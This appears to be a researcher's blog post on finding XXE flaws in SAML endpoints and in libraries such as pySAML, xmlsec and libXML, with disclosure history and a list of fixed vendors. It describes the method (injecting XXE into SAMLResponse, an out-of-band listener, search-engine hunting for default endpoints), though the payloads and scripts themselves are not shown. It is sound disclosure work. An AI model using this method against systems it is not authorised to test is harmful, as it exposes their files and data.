Following the white Rabbit
Down the SAML Code
This post is a more detail and personal write up version of the https://www.okta.com/blog/ post. If you are interested in reading the short — to the point — version of it, please follow the link. In any case, let’s get down to it. So what is SAML ?
Security Assertion Markup Language
According to wikipedia: “SAML is an XML-based, open-standard data format for exchanging authentication and authorization data between parties, in particular, between an identity provider and a service provider. SAML is a product of the OASIS Security Services Technical Committee. SAML dates from 2001; the most recent major update of SAML was published in 2005, but protocol enhancements have steadily been added through additional, optional standards.
The single most important requirement that SAML addresses is web browser single sign-on (SSO). Single sign-on is common at the intranet level (using cookies, for example) but extending it beyond the intranet has been problematic and has led to the proliferation of non-interoperable proprietary technologies. (Another more recent approach to addressing the browser SSO problem is the OpenID Connect protocol.”
Out of that we can determine one simple important fact: SAML is XML. Because of this, a lot of developers build their applications using third-party XML Parsers or write their own to parse the SAML payloads. In either case, both could end up being a bad thing on itself. As we all know XML is a very rich protocol that can be exploited in several ways. One of those ways is XXE, a vulnerability that allows an attacker to load remote entities, read local files, among other things.
Back in August, we found a Cloud Third-Party application used by us was vulnerable to an XXE attack. After finding it, we created a proper write up and followed up with the company’s security using our Responsible Vulnerability Disclosure process, but at the same time we raised the question.
“If they are vulnerable, who else will be?”
Java and other languages libraries with known XXE vulnerabilities date back to 2013, so I thought this was for the most part a fixed problem and there was nothing new to find. Nevertheless, being as hard headed and I am, I retested all known SAML SP endpoints; but where would I get a list? Totally kidding. I work for a Cloud Identify Provider, and our own app has one of the biggest SAML integration list in the world. :-) I had plenty of ACL endpoints to test.
Proof of Concept
At first, I started testing things manually using a custom proxy and replacing the SAMLResponse with a simple Malicious XML and/or by simply running the original response on a script that will inject a proof of concept XXE payload to the POST requests with an even simpler Listener embedded, the bash snipped below who we get a response back from a fake 22.214.171.124 IP.
In order to build a Proof of Concept of your own you can take a SAMLResponse from any POST request and using the methods below you can simply generate a non-malicious payload that will allow you to check whether or not you are vulnerable.
After a few hours, I had four new vulnerable services, appliances, etc, but this got boring very fast given manually testing each SAMLResponse was not fun. …Not to mention, the long emails doing responsible disclosure to each application or Appliance we found… AND to make it even worse sites were vulnerable by testing with thesimple XXE string mentioned above, which was not even valid SAML response. :(
List of vulnerable services/appliances:
- LucidChard ( fixed )
- MineCast ( fixed )
- OrgWiki ( fixed )
- SumoLogic ( fixed )
- Tableau ( fixed )
- Univention UMC ( fixed )
- Code42 ( fixed )
- among many others …
The best Security Team is an Automated “Lazy” one
I am a strong believer of “ running yourself out of a job through automation” is the best way to scale and to allow you to concentrate on better challenges that can’t be automated “just yet”. So in order to be in agreement with my own philosophy, I created a ruby script:
that allowed me to easily test new SAML SP while I was busy searching for more endpoints to test.
The more you have, the more you want ..
In order to find more I needed the help of Google or Bing to understand what most SAML Libraries were using as their default path. It was a big assumption, but most people using a third-party library most surely will not change the default endpoint.
I also realized that a lot of appliances were also capable of SAML, so I performed the same type of searches for known appliances.
One such Appliance found to be vulnerable on versions 5.3 and below were the Carbonate Pro servers from Code42, but after reporting the vulnerabilities to them they reported that they were aware of the issue and were in the process of providing fixes. https://httpsonly.blogspot.com.au/2017/01/0day-writeup-xxe-in-ubercom.html
Even-though most sites were not vulnerable, thankfully. The amount of sites found was still High, XXE is a serious vulnerability and the fact that these were not know raised some alerts on my paranoid mind. So could it be that it was not only due to developer’s not properly coding this, but the libraries being used were un-patched.
Around that time, one of the companies for which I had reported the issue, came back to me asking me if I could retest telling me that they had patched all libraries to the latest available version. I quickly re-tested and our surprised the vulnerability was still there. I asked if they could share with me which library and language they were using, which I gotta say the developers I was working with were awesome and were trying to trace the problem themselves. It is always gratifying working with people that care.
In any case, I found that pySAML was vulnerable to XXE, but after carefully reviewing their code, we realized the problem was not in pySAML, but on one of the dependencies they were using to sign/unsigned the code. XMLSEC1 a core library used in several other libraries was susceptible to XXE.
I immediately reported a vulnerability to their github repository ( https://github.com/rohe/pysaml2/issues/366) , to get started, given a solution could be implemented at the python level, but the more I looked into the code, the more it seems that XMLSEC was the responsible one which led us to create yet another vulnerability report on (https://github.com/lsh123/xmlsec/issues/43), but while generating the report, we finally came to the conclusion that the issue was also not their complete fault. XMLSEC uses libXML a core library from Gnome project and even though that library had already had XXE being reported a few years ago and they were fixed, this was a new yet undiscovered vulnerable path. Nevertheless, I reported the issue to XMLSEC, because while reviewing the code I still felt it was XMLSEC responsibility to correctly parse/filter this.
After a few hours of reporting this, the lead developer from XMLSEC immediately create a ticket on libXML, he had independently confirmed that the problem was indeed in libXML. https://bugzilla.gnome.org/show_bug.cgi?id=772726 To recap, at this point we not only had several applications vulnerable but we had found an XXE on a core library in addition to several other SAML libraries (pySAML, xmlSEC, go-SAML, etc), what a night !
Sadly, it took a lot of time for the libXML community to come up with a patch that will work and it will not damage backward compatibility too much, given the proposed fixes were intended to close the bug, but also were forcing a change on default behavior. Finally, after some time libXML, xmlSEC, go-SAML, pySAML or other known vulnerable libraries have a patch. Most of them implemented a fix at their own level given there was no answer from the main libXML project, resulting in an even stronger environment, given that now, each layer has its own protection not relying on third-party library security to prevent attacks.
This was an interesting bug we stumbled upon, and now it’s your turn to use Github Gist Script to test your custom apps and 3rd party code and make the internet less vulnerable.
Credit for reporting this vulnerability to Nokogiri Core goes to Danny Grander email@example.com, @grnd. Thanks, Danny…github.com